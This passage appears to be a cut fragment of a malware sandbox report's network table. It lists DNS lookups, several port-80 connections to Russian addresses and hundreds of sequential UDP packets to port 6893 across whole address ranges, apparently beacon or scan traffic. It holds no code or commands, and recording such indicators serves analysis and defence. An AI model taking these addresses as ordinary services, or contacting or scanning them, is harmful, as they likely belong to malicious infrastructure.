| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| RU | 91.218.114.79:80 | tcp | |
| RU | 91.218.114.79:80 | tcp | |
| RU | 91.218.114.26:80 | tcp | |
| RU | 91.218.114.31:80 | tcp | |
| RU | 91.218.114.4:80 | tcp | |
| US | 8.8.8.8:53 | udp | |
| N/A | 93.107.12.0:6893 | udp | |
| N/A | 93.107.12.1:6893 | udp | |
| N/A | 93.107.12.2:6893 | udp | |
| N/A | 93.107.12.3:6893 | udp | |
| N/A | 93.107.12.4:6893 | udp | |
| N/A | 93.107.12.5:6893 | udp | |
| N/A | 93.107.12.6:6893 | udp | |
| N/A | 93.107.12.7:6893 | udp | |
| N/A | 93.107.12.8:6893 | udp | |
| N/A | 93.107.12.9:6893 | udp | |
| N/A | 93.107.12.10:6893 | udp | |
| N/A | 93.107.12.11:6893 | udp | |
| N/A | 93.107.12.12:6893 | udp | |
| N/A | 93.107.12.13:6893 | udp | |
| N/A | 93.107.12.14:6893 | udp | |
| N/A | 93.107.12.15:6893 | udp | |
| N/A | 93.107.12.16:6893 | udp | |
| N/A | 93.107.12.17:6893 | udp | |
| N/A | 93.107.12.18:6893 | udp | |
| N/A | 93.107.12.19:6893 | udp | |
| N/A | 93.107.12.20:6893 | udp | |
| N/A | 93.107.12.21:6893 | udp | |
| N/A | 93.107.12.22:6893 | udp | |
| N/A | 93.107.12.23:6893 | udp | |
| N/A | 93.107.12.24:6893 | udp | |
| N/A | 93.107.12.25:6893 | udp | |
| N/A | 93.107.12.26:6893 | udp | |
| N/A | 93.107.12.27:6893 | udp | |
| N/A | 93.107.12.28:6893 | udp | |
| N/A | 93.107.12.29:6893 | udp | |
| N/A | 93.107.12.30:6893 | udp | |
| N/A | 93.107.12.31:6893 | udp | |
| N/A | 95.1.200.0:6893 | udp | |
| N/A | 95.1.200.1:6893 | udp | |
| N/A | 95.1.200.2:6893 | udp | |
| N/A | 95.1.200.3:6893 | udp | |
| N/A | 95.1.200.4:6893 | udp | |
| N/A | 95.1.200.5:6893 | udp | |
| N/A | 95.1.200.6:6893 | udp | |
| N/A | 95.1.200.7:6893 | udp | |
| N/A | 95.1.200.8:6893 | udp | |
| N/A | 95.1.200.9:6893 | udp | |
| N/A | 95.1.200.10:6893 | udp | |
| N/A | 95.1.200.11:6893 | udp | |
| N/A | 95.1.200.12:6893 | udp | |
| N/A | 95.1.200.13:6893 | udp | |
| N/A | 95.1.200.14:6893 | udp | |
| N/A | 95.1.200.15:6893 | udp | |
| N/A | 95.1.200.16:6893 | udp | |
| N/A | 95.1.200.17:6893 | udp | |
| N/A | 95.1.200.18:6893 | udp | |
| N/A | 95.1.200.19:6893 | udp | |
| N/A | 95.1.200.20:6893 | udp | |
| N/A | 95.1.200.21:6893 | udp | |
| N/A | 95.1.200.22:6893 | udp | |
| N/A | 95.1.200.23:6893 | udp | |
| N/A | 95.1.200.24:6893 | udp | |
| N/A | 95.1.200.25:6893 | udp | |
| N/A | 95.1.200.26:6893 | udp | |
| N/A | 95.1.200.27:6893 | udp | |
| N/A | 95.1.200.28:6893 | udp | |
| N/A | 95.1.200.29:6893 | udp | |
| N/A | 95.1.200.30:6893 | udp | |
| N/A | 95.1.200.31:6893 | udp | |
| N/A | 87.98.176.0:6893 | udp | |
| N/A | 87.98.176.1:6893 | udp | |
| N/A | 87.98.176.2:6893 | udp | |
| N/A | 87.98.176.3:6893 | udp | |
| N/A | 87.98.176.4:6893 | udp | |
| N/A | 87.98.176.5:6893 | udp | |
| N/A | 87.98.176.6:6893 | udp | |
| N/A | 87.98.176.7:6893 | udp | |
| N/A | 87.98.176.8:6893 | udp | |
| N/A | 87.98.176.9:6893 | udp | |
| N/A | 87.98.176.10:6893 | udp | |
| N/A | 87.98.176.11:6893 | udp | |
| N/A | 87.98.176.12:6893 | udp | |
| N/A | 87.98.176.13:6893 | udp | |
| N/A | 87.98.176.14:6893 | udp | |
| N/A | 87.98.176.15:6893 | udp | |
| N/A | 87.98.176.16:6893 | udp | |
| N/A | 87.98.176.17:6893 | udp | |
| N/A | 87.98.176.18:6893 | udp | |
| N/A | 87.98.176.19:6893 | udp | |
| N/A | 87.98.176.20:6893 | udp | |
| N/A | 87.98.176.21:6893 | udp | |
| N/A | 87.98.176.22:6893 | udp | |
| N/A | 87.98.176.23:6893 | udp | |
| N/A | 87.98.176.24:6893 | udp | |
| N/A | 87.98.176.25:6893 | udp | |
| N/A | 87.98.176.26:6893 | udp | |
| N/A | 87.98.176.27:6893 | udp | |
| N/A | 87.98.176.28:6893 | udp | |
| N/A | 87.98.176.29:6893 | udp | |
| N/A | 87.98.176.30:6893 | udp | |
| N/A | 87.98.176.31:6893 | udp | |
| N/A | 87.98.176.32:6893 | udp | |
| N/A | 87.98.176.33:6893 | udp | |
| N/A | 87.98.176.34:6893 | udp | |
| N/A | 87.98.176.35:6893 | udp | |
| N/A | 87.98.176.36:6893 | udp | |
| N/A | 87.98.176.37:6893 | udp | |
| N/A | 87.98.176.38:6893 | udp | |
| N/A | 87.98.176.39:6893 | udp | |
| N/A | 87.98.176.40:6893 | udp | |
| N/A | 87.98.176.41:6893 | udp | |
| N/A | 87.98.176.42:6893 | udp | |
| N/A | 87.98.176.43:6893 | udp | |
| N/A | 87.98.176.44:6893 | udp | |
| N/A | 87.98.176.45:6893 | udp | |
| N/A | 87.98.176.46:6893 | udp | |
| N/A | 87.98.176.47:6893 | udp | |
| N/A | 87.98.176.48:6893 | udp | |
| N/A | 87.98.176.49:6893 | udp | |
| N/A | 87.98.176.50:6893 | udp | |
| N/A | 87.98.176.51:6893 | udp | |
| N/A | 87.98.176.52:6893 | udp | |
| N/A | 87.98.176.53:6893 | udp | |
| N/A | 87.98.176.54:6893 | udp | |
| N/A | 87.98.176.55:6893 | udp | |
| N/A | 87.98.176.56:6893 | udp | |
| N/A | 87.98.176.57:6893 | udp | |
| N/A | 87.98.176.58:6893 | udp | |
| N/A | 87.98.176.59:6893 | udp | |
| N/A | 87.98.176.60:6893 | udp | |
| N/A | 87.98.176.61:6893 | udp | |
| N/A | 87.98.176.62:6893 | udp | |
| N/A | 87.98.176.63:6893 | udp | |
| N/A | 87.98.176.64:6893 | udp | |
| N/A | 87.98.176.65:6893 | udp | |
| N/A | 87.98.176.66:6893 | udp | |
| N/A | 87.98.176.67:6893 | udp | |
| N/A | 87.98.176.68:6893 | udp | |
| N/A | 87.98.176.69:6893 | udp | |
| N/A | 87.98.176.70:6893 | udp | |
| N/A | 87.98.176.71:6893 | udp | |
| N/A | 87.98.176.72:6893 | udp | |
| N/A | 87.98.176.73:6893 | udp | |
| N/A | 87.98.176.74:6893 | udp | |
| N/A | 87.98.176.75:6893 | udp | |
| N/A | 87.98.176.76:6893 | udp | |
| N/A | 87.98.176.77:6893 | udp | |
| N/A | 87.98.176.78:6893 | udp | |
| N/A | 87.98.176.79:6893 | udp | |
| N/A | 87.98.176.80:6893 | udp | |
| N/A | 87.98.176.81:6893 | udp | |
| N/A | 87.98.176.82:6893 | udp | |
| N/A | 87.98.176.83:6893 | udp | |
| N/A | 87.98.176.84:6893 | udp | |
| N/A | 87.98.176.85:6893 | udp | |
| N/A | 87.98.176.86:6893 | udp | |
| N/A | 87.98.176.87:6893 | udp | |
| N/A | 87.98.176.88:6893 | udp | |
| N/A | 87.98.176.89:6893 | udp | |
| N/A | 87.98.176.90:6893 | udp | |
| N/A | 87.98.176.91:6893 | udp | |
| N/A | 87.98.176.92:6893 | udp | |
| N/A | 87.98.176.93:6893 | udp | |
| N/A | 87.98.176.94:6893 | udp | |
| N/A | 87.98.176.95:6893 | udp | |
| N/A | 87.98.176.96:6893 | udp | |
| N/A | 87.98.176.97:6893 | udp | |
| N/A | 87.98.176.98:6893 | udp | |
| N/A | 87.98.176.99:6893 | udp | |
| N/A | 87.98.176.100:6893 | udp | |
| N/A | 87.98.176.101:6893 | udp | |
| N/A | 87.98.176.102:6893 | udp | |
| N/A | 87.98.176.103:6893 | udp | |
| N/A | 87.98.176.104:6893 | udp | |
| N/A | 87.98.176.105:6893 | udp | |
| N/A | 87.98.176.106:6893 | udp | |
| N/A | 87.98.176.107:6893 | udp | |
| N/A | 87.98.176.108:6893 | udp | |
| N/A | 87.98.176.109:6893 | udp | |
| N/A | 87.98.176.110:6893 | udp | |
| N/A | 87.98.176.111:6893 | udp | |
| N/A | 87.98.176.112:6893 | udp | |
| N/A | 87.98.176.113:6893 | udp | |
| N/A | 87.98.176.114:6893 | udp | |
| N/A | 87.98.176.115:6893 | udp | |
| N/A | 87.98.176.116:6893 | udp | |
| N/A | 87.98.176.117:6893 | udp | |
| N/A | 87.98.176.118:6893 | udp | |
| N/A | 87.98.176.119:6893 | udp | |
| N/A | 87.98.176.120:6893 | udp | |
| N/A | 87.98.176.121:6893 | udp | |
| N/A | 87.98.176.122:6893 | udp | |
| N/A | 87.98.176.123:6893 | udp | |
| N/A | 87.98.176.124:6893 | udp | |
| N/A | 87.98.176.125:6893 | udp | |
| N/A | 87.98.176.126:6893 | udp | |
| N/A | 87.98.176.127:6893 | udp | |
| N/A | 87.98.176.128:6893 | udp | |
| N/A | 87.98.176.129:6893 | udp | |
| N/A | 87.98.176.130:6893 | udp | |
| N/A | 87.98.176.131:6893 | udp | |
| N/A | 87.98.176.132:6893 | udp | |
| N/A | 87.98.176.133:6893 | udp | |
| N/A | 87.98.176.134:6893 | udp | |
| N/A | 87.98.176.135:6893 | udp | |
| N/A | 87.98.176.136:6893 | udp | |
| N/A | 87.98.176.137:6893 | udp | |
| N/A | 87.98.176.138:6893 | udp | |
| N/A | 87.98.176.139:6893 | udp | |
| N/A | 87.98.176.140:6893 | udp | |
| N/A | 87.98.176.141:6893 | udp | |
| N/A | 87.98.176.142:6893 | udp | |
| N/A | 87.98.176.143:6893 | udp | |
| N/A | 87.98.176.144:6893 | udp | |
| N/A | 87.98.176.145:6893 | udp | |
| N/A | 87.98.176.146:6893 | udp | |
| N/A | 87.98.176.147:6893 | udp | |
| N/A | 87.98.176.148:6893 | udp | |
| N/A | 87.98.176.149:6893 | udp | |
| N/A | 87.98.176.150:6893 | udp | |
| N/A | 87.98.176.151:6893 | udp | |
| N/A | 87.98.176.152:6893 | udp | |
| N/A | 87.98.176.153:6893 | udp | |
| N/A | 87.98.176.154:6893 | udp | |
| N/A | 87.98.176.155:6893 | udp | |
| N/A | 87.98.176.156:6893 | udp | |
| N/A | 87.98.176.157:6893 | udp | |
| N/A | 87.98.176.158:6893 | udp | |
| N/A | 87.98.176.159:6893 | udp | |
| N/A | 87.98.176.160:6893 | udp | |
| N/A | 87.98.176.161:6893 | udp | |
| N/A | 87.98.176.162:6893 | udp | |
| N/A | 87.98.176.163:6893 | udp | |
| N/A | 87.98.176.164:6893 | udp | |
| N/A | 87.98.176.165:6893 | udp | |
| N/A | 87.98.176.166:6893 | udp | |
| N/A | 87.98.176.167:6893 | udp | |
| N/A | 87.98.176.168:6893 | udp | |
| N/A | 87.98.176.169:6893 | udp | |
| N/A | 87.98.176.170:6893 | udp | |
| N/A | 87.98.176.171:6893 | udp | |
| N/A | 87.98.176.172:6893 | udp | |
| N/A | 87.98.176.173:6893 | udp | |
| N/A | 87.98.176.174:6893 | udp | |
| N/A | 87.98.176.175:6893 | udp | |
| N/A | 87.98.176.176:6893 | udp | |
| N/A | 87.98.176.177:6893 | udp | |
| N/A | 87.98.176.178:6893 | udp | |
| N/A | 87.98.176.179:6893 | udp | |
| N/A | 87.98.176.180:6893 | udp | |
| N/A | 87.98.176.181:6893 | udp | |
| N/A | 87.98.176.182:6893 | udp | |
| N/A | 87.98.176.183:6893 | udp | |
| N/A | 87.98.176.184:6893 | udp | |
| N/A | 87.98.176.185:6893 | udp | |
| N/A | 87.98.176.186:6893 | udp | |
| N/A | 87.98.176.187:6893 | udp | |
| N/A | 87.98.176.188:6893 | udp | |
| N/A | 87.98.176.189:6893 | udp | |
| N/A | 87.98.176.190:6893 | udp | |
| N/A | 87.98.176.191:6893 | udp | |
| N/A | 87.98.176.192:6893 | udp | |
| N/A | 87.98.176.193:6893 | udp | |
| N/A | 87.98.176.194:6893 | udp | |
| N/A | 87.98.176.195:6893 | udp | |
| N/A | 87.98.176.196:6893 | udp | |
| N/A | 87.98.176.197:6893 | udp | |
| N/A | 87.98.176.198:6893 | udp | |
| N/A | 87.98.176.199:6893 | udp | |
| N/A | 87.98.176.200:6893 | udp | |
| N/A | 87.98.176.201:6893 | udp | |
| N/A | 87.98.176.202:6893 | udp | |
| N/A | 87.98.176.203:6893 | udp | |
| N/A | 87.98.176.204:6893 | udp | |
| N/A | 87.98.176.205:6893 | udp | |
| N/A | 87.98.176.206:6893 | udp | |
| N/A | 87.98.176.207:6893 | udp | |
| N/A | 87.98.176.208:6893 | udp | |
| N/A | 87.98.176.209:6893 | udp | |
| N/A | 87.98.176.210:6893 | udp | |
| N/A | 87.98.176.211:6893 | udp | |
| N/A | 87.98.176.212:6893 | udp | |
| N/A | 87.98.176.213:6893 | udp | |
| N/A | 87.98.176.214:6893 | udp | |
| N/A | 87.98.176.215:6893 | udp | |
| N/A | 87.98.176.216:6893 | udp | |
| N/A | 87.98.176.217:6893 | udp | |
| N/A | 87.98.176.218:6893 | udp | |
| N/A | 87.98.176.219:6893 | udp | |
| N/A | 87.98.176.220:6893 | udp | |
| N/A | 87.98.176.221:6893 | udp | |
| N/A | 87.98.176.222:6893 | udp | |
| N/A | 87.98.176.223:6893 | udp | |
| N/A | 87.98.176.224:6893 | udp | |
| N/A | 87.98.176.225:6893 | udp | |
| N/A | 87.98.176.226:6893 | udp | |
| N/A | 87.98.176.227:6893 | udp | |
| N/A | 87.98.176.228:6893 | udp | |
| N/A | 87.98.176.229:6893 | udp | |
| N/A | 87.98.176.230:6893 | udp | |
| N/A | 87.98.176.231:6893 | udp | |
| N/A | 87.98.176.232:6893 | udp | |
| N/A | 87.98.176.233:6893 | udp | |
| N/A | 87.98.176.234:6893 | udp | |
| N/A | 87.98.176.235:6893 | udp | |
| N/A | 87.98.176.236:6893 | udp | |
| N/A | 87.98.176.237:6893 | udp | |
| N/A | 87.98.176.238:6893 | udp | |
| N/A | 87.98.176.239:6893 | udp | |
| N/A | 87.98.176.240:6893 | udp | |
| N/A | 87.98.176.241:6893 | udp | |
| N/A | 87.98.176.242:6893 | udp | |
| N/A | 87.98.176.243:6893 | udp | |
| N/A | 87.98.176.244:6893 | udp | |
| N/A | 87.98.176.245:6893 | udp | |
| N/A | 87.98.176.246:6893 | udp | |
| N/A | 87.98.176.247:6893 | udp | |
| N/A | 87.98.176.248:6893 | udp | |
| N/A | 87.98.176.249:6893 | udp | |
| N/A | 87.98.176.250:6893 | udp | |
| N/A | 87.98.176.251:6893 | udp | |
| N/A | 87.98.176.252:6893 | udp | |
| N/A | 87.98.176.253:6893 | udp | |
| N/A | 87.98.176.254:6893 | udp | |
| RU | 92.63.107.12:80 | tcp | |
| N/A | 87.98.176.255:6893 | udp | |
| N/A | 87.98.177.0:6893 | udp | |
| N/A | 87.98.177.1:6893 | udp | |
| N/A | 87.98.177.2:6893 | udp | |
| N/A | 87.98.177.3:6893 | udp | |
| N/A | 87.98.177.4:6893 | udp | |
| N/A | 87.98.177.5:6893 | udp | |
| N/A | 87.98.177.6:6893 | udp | |
| N/A | 87.98.177.7:6893 | udp | |
| N/A | 87.98.177.8:6893 | udp | |
| N/A | 87.98.177.9:6893 | udp | |
| N/A | 87.98.177.10:6893 | udp | |
| N/A | 87.98.177.11:6893 | udp | |
| N/A | 87.98.177.12:6893 | udp | |
| N/A | 87.98.177.13:6893 | udp | |
| N/A | 87.98.177.14:6893 | udp | |
| N/A | 87.98.177.15:6893 | udp | |
| N/A | 87.98.177.16:6893 | udp | |
| N/A | 87.98.177.17:6893 | udp | |
| N/A | 87.98.177.18:6893 | udp | |
| N/A | 87.98.177.19:6893 | udp | |
| N/A | 87.98.177.20:6893 | udp | |
| N/A | 87.98.177.21:6893 | udp | |
| N/A | 87.98.177.22:6893 | udp | |
| N/A | 87.98.177.23:6893 | udp | |
| N/A | 87.98.177.24:6893 | udp | |
| N/A | 87.98.177.25:6893 | udp | |
| N/A | 87.98.177.26:6893 | udp | |
| N/A | 87.98.177.27:6893 | udp | |
| N/A | 87.98.177.28:6893 | udp | |
| N/A | 87.98.177.29:6893 | udp | |
| N/A | 87.98.177.30:6893 | udp | |
| N/A | 87.98.177.31:6893 | udp | |
| N/A | 87.98.177.32:6893 | udp | |
| N/A | 87.98.177.33:6893 | udp | |
| N/A | 87.98.177.34:6893 | udp | |
| N/A | 87.98.177.35:6893 | udp | |
| N/A | 87.98.177.36:6893 | udp | |
| N/A | 87.98.177.37:6893 | udp | |
| N/A | 87.98.177.38:6893 | udp | |
| N/A | 87.98.177.39:6893 | udp | |
| N/A | 87.98.177.40:6893 | udp | |
| N/A | 87.98.177.41:6893 | udp | |
| N/A | 87.98.177.42:6893 | udp | |
| N/A | 87.98.177.43:6893 | udp | |
| N/A | 87.98.177.44:6893 | udp | |
| N/A | 87.98.177.45:6893 | udp | |
| N/A | 87.98.177.46:6893 | udp | |
| N/A | 87.98.177.47:6893 | udp | |
| N/A | 87.98.177.48:6893 | udp | |
| N/A | 87.98.177.49:6893 | udp | |
| N/A | 87.98.177.50:6893 | udp | |
| N/A | 87.98.177.51:6893 | udp | |
| N/A | 87.98.177.52:6893 | udp | |
| N/A | 87.98.177.53:6893 | udp | |
| N/A | 87.98.177.54:6893 | udp | |
| N/A | 87.98.177.55:6893 | udp | |
| N/A | 87.98.177.56:6893 | udp | |
| N/A | 87.98.177.57:6893 | udp | |
| N/A | 87.98.177.58:6893 | udp | |
| N/A | 87.98.177.59:6893 | udp | |
| N/A | 87.98.177.60:6893 | udp | |
| N/A | 87.98.177.61:6893 | udp | |
| N/A | 87.98.177.62:6893 | udp | |
| N/A | 87.98.177.63:6893 | udp | |
| N/A | 87.98.177.64:6893 | udp | |
| N/A | 87.98.177.65:6893 | udp | |
| N/A | 87.98.177.66:6893 | udp | |
| N/A | 87.98.177.67:6893 | udp | |
| N/A | 87.98.177.68:6893 | udp | |
| N/A | 87.98.177.69:6893 | udp | |
| N/A | 87.98.177.70:6893 | udp | |
| N/A | 87.98.177.71:6893 | udp | |
| N/A | 87.98.177.72:6893 | udp | |
| N/A | 87.98.177.73:6893 | udp | |
| N/A | 87.98.177.74:6893 | udp | |
| N/A | 87.98.177.75:6893 | udp | |
| N/A | 87.98.177.76:6893 | udp | |
| N/A | 87.98.177.77:6893 | udp | |
| N/A | 87.98.177.78:6893 | udp | |
| N/A | 87.98.177.79:6893 | udp | |
| N/A | 87.98.177.80:6893 | udp | |
| N/A | 87.98.177.81:6893 | udp | |
| N/A | 87.98.177.82:6893 | udp | |
| N/A | 87.98.177.83:6893 | udp | |
| N/A | 87.98.177.84:6893 | udp | |
| N/A | 87.98.177.85:6893 | udp | |
| N/A | 87.98.177.86:6893 | udp | |
| N/A | 87.98.177.87:6893 | udp | |
| N/A | 87.98.177.88:6893 | udp | |
| N/A | 87.98.177.89:6893 | udp | |
| N/A | 87.98.177.90:6893 | udp | |
| N/A | 87.98.177.91:6893 | udp | |
| N/A | 87.98.177.92:6893 | udp | |
| N/A | 87.98.177.93:6893 | udp | |
| N/A | 87.98.177.94:6893 | udp | |
| N/A | 87.98.177.95:6893 | udp | |
| N/A | 87.98.177.96:6893 | udp | |
| N/A | 87.98.177.97:6893 | udp | |
| N/A | 87.98.177.98:6893 | udp | |
| N/A | 87.98.177.99:6893 | udp | |
| N/A | 87.98.177.100:6893 | udp | |
| N/A | 87.98.177.101:6893 | udp | |
| N/A | 87.98.177.102:6893 | udp | |
| N/A | 87.98.177.103:6893 | udp | |
| N/A | 87.98.177.104:6893 | udp | |
| N/A | 87.98.177.105:6893 | udp | |
| N/A | 87.98.177.106:6893 | udp | |
| N/A | 87.98.177.107:6893 | udp | |
| N/A | 87.98.177.108:6893 | udp | |
| N/A | 87.98.177.109:6893 | udp | |
| N/A | 87.98.177.110:6893 | udp | |
| N/A | 87.98.177.111:6893 | udp | |
| N/A | 87.98.177.112:6893 | udp | |
| N/A | 87.98.177.113:6893 | udp | |
| N/A | 87.98.177.114:6893 | udp | |
| N/A | 87.98.177.115:6893 | udp | |
| N/A | 87.98.177.116:6893 | udp | |
| N/A | 87.98.177.117:6893 | udp | |
| N/A | 87.98.177.118:6893 | udp | |
| N/A | 87.98.177.119:6893 | udp | |
| N/A | 87.98.177.120:6893 | udp | |
| N/A | 87.98.177.121:6893 | udp | |
| N/A | 87.98.177.122:6893 | udp | |
| N/A | 87.98.177.123:6893 | udp | |
| N/A | 87.98.177.124:6893 | udp | |
| N/A | 87.98.177.125:6893 | udp | |
| N/A | 87.98.177.126:6893 | udp | |
| N/A | 87.98.177.127:6893 | udp | |
| N/A | 87.98.177.128:6893 | udp | |
| N/A | 87.98.177.129:6893 | udp | |
| N/A | 87.98.177.130:6893 | udp | |
| N/A | 87.98.177.131:6893 | udp | |
| N/A | 87.98.177.132:6893 | udp | |
| N/A | 87.98.177.133:6893 | udp | |
| N/A | 87.98.177.134:6893 | udp | |
| N/A | 87.98.177.135:6893 | udp | |
| N/A | 87.98.177.136:6893 | udp | |
| N/A | 87.98.177.137:6893 | udp | |
| N/A | 87.98.177.138:6893 | udp | |
| N/A | 87.98.177.139:6893 | udp | |
| N/A | 87.98.177.140:6893 | udp | |
| N/A | 87.98.177.141:6893 | udp | |
| N/A | 87.98.177.142:6893 | udp | |
| N/A | 87.98.177.143:6893 | udp | |
| N/A | 87.98.177.144:6893 | udp | |
| N/A | 87.98.177.145:6893 | udp | |
| N/A | 87.98.177.146:6893 | udp | |
| N/A | 87.98.177.147:6893 | udp | |
| N/A | 87.98.177.148:6893 | udp | |
| N/A | 87.98.177.149:6893 | udp | |
| N/A | 87.98.177.150:6893 | udp | |
| N/A | 87.98.177.151:6893 | udp | |
| N/A | 87.98.177.152:6893 | udp | |
| N/A | 87.98.177.153:6893 | udp | |
| N/A | 87.98.177.154:6893 | udp | |
| N/A | 87.98.177.155:6893 | udp | |
| N/A | 87.98.177.156:6893 | udp | |
| N/A | 87.98.177.157:6893 | udp | |
| N/A | 87.98.177.158:6893 | udp | |
| N/A | 87.98.177.159:6893 | udp | |
| N/A | 87.98.177.160:6893 | udp | |
| N/A | 87.98.177.161:6893 | udp | |
| N/A | 87.98.177.162:6893 | udp | |
| N/A | 87.98.177.163:6893 | udp | |
| N/A | 87.98.177.164:6893 | udp | |
| N/A | 87.98.177.165:6893 | udp | |
| N/A | 87.98.177.166:6893 | udp | |
| N/A | 87.98.177.167:6893 | udp | |
| N/A | 87.98.177.168:6893 | udp | |
| N/A | 87.98.177.169:6893 | udp | |
| N/A | 87.98.177.170:6893 | udp | |
| N/A | 87.98.177.171:6893 | udp | |
| N/A | 87.98.177.172:6893 | udp | |
| N/A | 87.98.177.173:6893 | udp | |
| N/A | 87.98.177.174:6893 | udp | |
| N/A | 87.98.177.175:6893 | udp | |
| N/A | 87.98.177.176:6893 | udp | |
| N/A | 87.98.177.177:6893 | udp | |
| N/A | 87.98.177.178:6893 | udp | |
| N/A | 87.98.177.179:6893 | udp | |
| N/A | 87.98.177.180:6893 | udp | |
| N/A | 87.98.177.181:6893 | udp | |
| N/A | 87.98.177.182:6893 | udp | |
| N/A | 87.98.177.183:6893 | udp | |
| N/A | 87.98.177.184:6893 | udp | |
| N/A | 87.98.177.185:6893 | udp | |
| N/A | 87.98.177.186:6893 | udp | |
| N/A | 87.98.177.187:6893 | udp | |
| N/A | 87.98.177.188:6893 | udp | |
| N/A | 87.98.177.189:6893 | udp | |
| N/A | 87.98.177.190:6893 | udp | |
| N/A | 87.98.177.191:6893 | udp | |
| N/A | 87.98.177.192:6893 | udp | |
| N/A | 87.98.177.193:6893 | udp | |
| N/A | 87.98.177.194:6893 | udp | |
| N/A | 87.98.177.195:6893 | udp | |
| N/A | 87.98.177.196:6893 | udp | |
| N/A | 87.98.177.197:6893 | udp | |
| N/A | 87.98.177.198:6893 | udp | |
| N/A | 87.98.177.199:6893 | udp | |
| N/A | 87.98.177.200:6893 | udp | |
| N/A | 87.98.177.201:6893 | udp | |
| N/A | 87.98.177.202:6893 | udp | |
| N/A | 87.98.177.203:6893 | udp | |
| N/A | 87.98.177.204:6893 | udp | |
| N/A | 87.98.177.205:6893 | udp | |
| N/A | 87.98.177.206:6893 | udp | |
| N/A | 87.98.177.207:6893 | udp | |
| N/A | 87.98.177.208:6893 | udp | |
| N/A | 87.98.177.209:6893 | udp | |
| N/A | 87.98.177.210:6893 | udp | |
| N/A | 87.98.177.211:6893 | udp | |
| N/A | 87.98.177.212:6893 | udp | |
| N/A | 87.98.177.213:6893 | udp | |
| N/A | 87.98.177.214:6893 | udp | |
| N/A | 87.98.177.215:6893 | udp | |
| N/A | 87.98.177.216:6893 | udp | |
| N/A | 87.98.177.217:6893 | udp | |
| N/A | 87.98.177.218:6893 | udp | |
| N/A | 87.98.177.219:6893 | udp | |
| N/A | 87.98.177.220:6893 | udp | |
| N/A | 87.98.177.221:6893 | udp | |
| N/A | 87.98.177.222:6893 | udp | |
| N/A | 87.98.177.223:6893 | udp | |
| N/A | 87.98.177.224:6893 | udp | |
| N/A | 87.98.177.225:6893 | udp | |
| N/A | 87.98.177.226:6893 | udp | |
| N/A | 87.98.177.227:6893 | udp | |
| N/A | 87.98.177.228:6893 | udp | |
| N/A | 87.98.177.229:6893 | udp | |
| N/A | 87.98.177.230:6893 | udp | |
| N/A | 87.98.177.231:6893 | udp | |
| N/A | 87.98.177.232:6893 | udp | |
| N/A | 87.98.177.233:6893 | udp | |
| N/A | 87.98.177.234:6893 | udp | |
| N/A | 87.98.177.235:6893 | udp | |
| N/A | 87.98.177.236:6893 | udp | |
| N/A | 87.98.177.237:6893 | udp | |
| N/A | 87.98.177.238:6893 | udp | |
| N/A | 87.98.177.239:6893 | udp | |
| N/A | 87.98.177.240:6893 | udp | |
| N/A | 87.98.177.241:6893 | udp | |
| N/A | 87.98.177.242:6893 | udp | |
| N/A | 87.98.177.243:6893 | udp | |
| N/A | 87.98.177.244:6893 | udp | |
| N/A | 87.98.177.245:6893 | udp | |
| N/A | 87.98.177.246:6893 | udp | |
| N/A | 87.98.177.247:6893 | udp | |
| N/A | 87.98.177.248:6893 | udp | |
| N/A | 87.98.177.249:6893 | udp | |
| N/A | 87.98.177.250:6893 | udp | |
| N/A | 87.98.177.251:6893 | udp | |
| N/A | 87.98.177.252:6893 | udp | |
| N/A | 87.98.177.253:6893 | udp | |
| N/A | 87.98.177.254:6893 | udp | |
| RU | 91.218.114.11:80 | tcp | |
| N/A | 87.98.177.255:6893 | udp | |
| N/A | 87.98.178.0:6893 | udp | |
| N/A | 87.98.178.1:6893 | udp | |
| N/A | 87.98.178.2:6893 | udp | |
| N/A | 87.98.178.3:6893 | udp | |
| N/A | 87.98.178.4:6893 | udp | |
| N/A | 87.98.178.5:6893 | udp | |
| N/A | 87.98.178.6:6893 | udp | |
| N/A | 87.98.178.7:6893 | udp | |
| N/A | 87.98.178.8:6893 | udp | |
| N/A | 87.98.178.9:6893 | udp | |
| N/A | 87.98.178.10:6893 | udp | |
| N/A | 87.98.178.11:6893 | udp | |
| N/A | 87.98.178.12:6893 | udp | |
| N/A | 87.98.178.13:6893 | udp | |
| N/A | 87.98.178.14:6893 | udp | |
| N/A | 87.98.178.15:6893 | udp | |
| N/A | 87.98.178.16:6893 | udp | |
| N/A | 87.98.178.17:6893 | udp | |
| N/A | 87.98.178.18:6893 | udp | |
| N/A | 87.98.178.19:6893 | udp | |
| N/A | 87.98.178.20:6893 | udp | |
| N/A | 87.98.178.21:6893 | udp | |
| N/A | 87.98.178.22:6893 | udp | |
| N/A | 87.98.178.23:6893 | udp | |
| N/A | 87.98.178.24:6893 | udp | |
| N/A | 87.98.178.25:6893 | udp | |
| N/A | 87.98.178.26:6893 | udp | |
| N/A | 87.98.178.27:6893 | udp | |
| N/A | 87.98.178.28:6893 | udp | |
| N/A | 87.98.178.29:6893 | udp | |
| N/A | 87.98.178.30:6893 | udp | |
| N/A | 87.98.178.31:6893 | udp | |
| N/A | 87.98.178.32:6893 | udp | |
| N/A | 87.98.178.33:6893 | udp | |
| N/A | 87.98.178.34:6893 | udp | |
| N/A | 87.98.178.35:6893 | udp | |
| N/A | 87.98.178.36:6893 | udp | |
| N/A | 87.98.178.37:6893 | udp | |
| N/A | 87.98.178.38:6893 | udp | |
| N/A | 87.98.178.39:6893 | udp | |
| N/A | 87.98.178.40:6893 | udp | |
| N/A | 87.98.178.41:6893 | udp | |
| N/A | 87.98.178.42:6893 | udp | |
| N/A | 87.98.178.43:6893 | udp | |
| N/A | 87.98.178.44:6893 | udp | |
| N/A | 87.98.178.45:6893 | udp | |
| N/A | 87.98.178.46:6893 | udp | |
| N/A | 87.98.178.47:6893 | udp | |
| N/A | 87.98.178.48:6893 | udp | |
| N/A | 87.98.178.49:6893 | udp | |
| N/A | 87.98.178.50:6893 | udp | |
| N/A | 87.98.178.51:6893 | udp | |
| N/A | 87.98.178.52:6893 | udp | |
| N/A | 87.98.178.53:6893 | udp | |
| N/A | 87.98.178.54:6893 | udp | |
| N/A | 87.98.178.55:6893 | udp | |
| N/A | 87.98.178.56:6893 | udp | |
| N/A | 87.98.178.57:6893 | udp | |
| N/A | 87.98.178.58:6893 | udp | |
| N/A | 87.98.178.59:6893 | udp | |
